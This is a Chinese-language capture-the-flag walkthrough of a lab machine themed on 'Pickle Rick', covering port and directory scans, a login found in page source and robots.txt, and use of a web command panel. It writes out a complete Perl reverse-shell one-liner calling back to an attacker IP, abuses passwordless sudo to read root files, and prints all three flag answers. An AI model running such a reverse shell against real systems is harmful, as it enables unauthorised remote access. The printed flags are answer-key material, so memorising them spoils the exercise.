觀前提示:
代碼段或者文欄位存在過長部分,請使用滑鼠左鍵選中要查看的一行內容,按住滑鼠左鍵并平行向右拖動觀看,
或者向右拖動代碼段、文欄位下方的滾動條,亦可查看 過長部分的內容,
任務目標
找到藥水所需要的3個材料,將幫助瑞克制作他的藥水,把自己從一個泡菜變回人類,
目標地址https:/MACHINE-IP.p.thmlabs.com 此處為:https://10-10-253-251.p.thmlabs.com/
實踐操作
埠掃描
nmap -T4 -sC -sV -p- 10.10.253.251
目標開放了兩個埠:22/tcp ssh服務、80/tcp http服務
訪問目標網站的http服務,查看網站源代碼,獲取到關于用戶名的提示:
用戶名為:R1ckRul3s
目錄和檔案掃描
gobuster dir -u http://10.10.253.251 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,sh,txt,cgi,html,css,js,py
掃描到
/index.html
/login.php
/assets
/portal.php
/robots.txt
去目標站點訪問以上頁面和檔案:
index.html是首頁,和之前訪問網站時的默認頁面一樣,
login.php是登陸頁面(這個要關注一下),
assets目錄下有一些網站資源檔案(看了一下沒啥特別的),
portal.php訪問時會自動跳轉到之前的login.php頁面,估計要登陸后才能看到,
robot.txt檔案有一串字符為Wubbalubbadubdub,可能是登陸密碼,
在登陸頁面嘗試使用之前得到的用戶名以及在robots檔案中得到的字符進行登陸,發現能夠登陸成功,并給出一個命令執行面板:
利用命令面板,輸入命令查找檔案資訊,找到第一個flag(無法通過cat命令查看,但可通過url路徑進行訪問):
第一個flag是:mr. meeseek hair
繼續探索命令面板,第一次使用ls命令還看到了一些其他檔案,現在嘗試訪問一下,denied.php是一個被禁止訪問的頁面,clue.txt提示我們在檔案系統中查找其他成分:
利用網站所提供的命令面板建立反向shell(這里試了很多語言的反向shell,發現Perl語言的shell可行),首先在攻擊機終端建立監聽器,查看該服務器是否支持Perl(命令:which Perl),再執行Perl的反向shell命令:
反向shell命令內容參考(修改ip、埠和攻擊機匹配):https://github.com/security-cheatsheet/reverse-shell-cheatsheet
perl -e 'use Socket;$i="10.14.30.69";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
成功建立反向shell,查找flag即可,第一個flag我們已經知道 我們找其他的(當前目錄沒有目標flag時,嘗試找/home、/root等關鍵目錄):
第二個flag是:1 jerry tear
上圖中的 cat 'second ingredients' 之所以加單引號是因為該名稱中間存在空格如果不加引號 則只能識別到second而不是second ingredients
也可以嘗試用其他方式處理:second\ ingredients或者"second ingredients"
嘗試cd /root,發現無法移動到/root目錄下,
輸入sudo -l 列出目前用戶可執行與無法執行的指令,發現我們可以通過sudo免密碼使用root用戶:
第三個flag是:fleeb juice
關于第二個flag和第三個flag的其他解法
利用登陸之后網頁所提供的命令面板:
輸入ls會顯示當前網站根目錄下的目錄及檔案
輸入sudo -l列出目前用戶可執行與無法執行的指令,發現我們可以通過sudo免密碼使用root用戶
此時,可以使用sudo ls命令找到/home目錄以及/root下的flag檔案,
對于/home目錄,也可以通過組合命令(cd /home;ls;pwd、cd /home/rick/;ls;pwd)去找flag檔案
如果想通過網站url訪問flag檔案內容,可以使用sudo cp命令復制flag檔案到網站根目錄,涉及的命令如下:
sudo ls /home
sudo ls /home/rick/
sudo cp /home/rick/second\ ingredients ./second.txt
sudo ls /root
sudo cp /root/3rd.txt .
如果想直接在網頁的命令面板界面查看flag內容,可以使用以下命令(當然前提還是要先找到flag檔案的位置):
less /home/rick/second\ ingredients
sudo less /root/3rd.txt
關于less命令:less命令 的作用與more十分相似,都可以用來瀏覽文字檔案的內容,不同的是less命令允許用戶向前或向后瀏覽檔案,而more命令只能向前瀏覽,
完整答案
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/509679.html
標籤:其他
下一篇:WEB自動化-11-資料驅動